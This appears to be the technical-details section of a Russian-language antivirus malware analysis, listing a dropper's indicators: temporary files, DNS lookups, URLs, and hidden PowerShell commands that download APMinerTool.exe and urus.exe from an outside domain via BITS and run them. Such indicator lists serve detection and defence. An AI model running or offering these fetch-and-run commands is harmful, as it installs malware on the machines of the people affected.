Техническая информация
- %TEMP%\ixp000.tmp\oxesflsx.dat
- %TEMP%\ixp000.tmp\opzzaku
- %TEMP%\ixp000.tmp\bit2876.tmp
- %TEMP%\ixp000.tmp\bit2887.tmp
- %TEMP%\ixp000.tmp\bit2876.tmp
- %TEMP%\ixp000.tmp\bit2887.tmp
- %TEMP%\ixp000.tmp\opzzaku
- %TEMP%\ixp000.tmp\oxesflsx.dat
- %TEMP%\ixp000.tmp\hl.exe
- %TEMP%\ixp000.tmp\jbij.exe
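- %TEMP%\ixp000.tmp\bit2876.tmp в %TEMP%\ixp000.tmp\jbij.exe (временный файл BITS переименован в целевой файл загрузки)
- %TEMP%\ixp000.tmp\bit2887.tmp в %TEMP%\ixp000.tmp\hl.exe (временный файл BITS переименован в целевой файл загрузки)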
- 'microsoft.com':80
- 'si##i.am':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://si##i.am/origin/APMinerTool.exe
- http://si##i.am/lereload/urus.exe
- DNS ASK microsoft.com
- DNS ASK si##i.am
- DNS ASK public-trust.com
- '%TEMP%\ixp000.tmp\jbij.exe'
- '%TEMP%\ixp000.tmp\hl.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://sindi.am/origin/APMinerTool.exe,http://sindi.am/lereload/urus.exe -Destination JBij.exe,HL.exe;' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process JBij.exe; Start-Process HL.exe;' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process JBij.exe; Start-Process HL.exe;